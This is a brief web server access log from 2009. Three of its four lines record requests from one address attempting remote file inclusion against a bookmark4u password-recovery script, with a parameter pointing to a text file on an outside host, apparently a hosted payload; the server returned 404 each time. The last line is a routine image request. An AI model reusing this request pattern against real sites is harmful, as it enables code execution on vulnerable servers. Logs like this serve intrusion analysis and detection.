190.3.107.130 - - [17/Oct/2009:03:04:05 -0400] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://www.fileden.com/files/2009/9/19/2579345/fx29id1.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
190.3.107.130 - - [17/Oct/2009:03:04:05 -0400] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.fileden.com/files/2009/9/19/2579345/fx29id1.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
190.3.107.130 - - [17/Oct/2009:03:04:05 -0400] "GET /logs/access_log.Q109062300//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.fileden.com/files/2009/9/19/2579345/fx29id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
220.110.168.82 - - [17/Oct/2009:03:04:46 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
